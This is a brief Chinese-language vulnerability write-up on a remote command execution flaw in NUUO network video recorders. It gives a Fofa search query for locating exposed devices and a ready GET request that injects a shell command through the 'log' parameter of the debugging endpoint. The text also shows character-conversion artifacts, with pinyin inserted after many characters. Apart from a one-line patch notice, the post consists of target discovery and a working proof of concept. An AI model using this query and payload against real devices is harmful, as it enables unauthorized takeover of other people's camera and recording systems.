0x01 產(chǎn)品描述：

?? ? ? ?NUUO攝像頭?是由中國(guó)臺(tái)灣NUUO公司生產(chǎn)的一款網(wǎng)絡(luò)視頻錄像機(jī)（Network Video Recorder，簡(jiǎn)稱NVR），廣泛應(yīng)用于零售、交通、教育、政府和銀行等多個(gè)領(lǐng)域。它能夠同時(shí)管理多個(gè)IP攝像頭，實(shí)現(xiàn)視頻錄制、存儲(chǔ)、回放及遠(yuǎn)程監(jiān)控等功能，采用先進(jìn)的視頻處理技術(shù)，提供高清、流暢的視頻畫面，滿足各種復(fù)雜環(huán)境下的監(jiān)控需求?。
0x02 漏洞描述：

????????NUUO NVR攝像頭在debugging_center_utils接口處存在遠(yuǎn)程命令執(zhí)行，攻擊者可通過該漏洞在服務(wù)器上執(zhí)行任意命令，獲取服務(wù)器權(quán)限。
0x03 搜索語句：

Fofa：title="Network Video Recorder Login" || body="www.nuuo.com/eHelpdesk.php"

0x04 漏洞復(fù)現(xiàn)：

GET /__debugging_center_utils___.php?log=|netstat HTTP/1.1
Host: your-ip
Content-Type: text/xml; charset=utf-8
Content-Length: length

0x05 修復(fù)建議：

廠商已發(fā)布補(bǔ)丁 請(qǐng)即時(shí)修復(fù)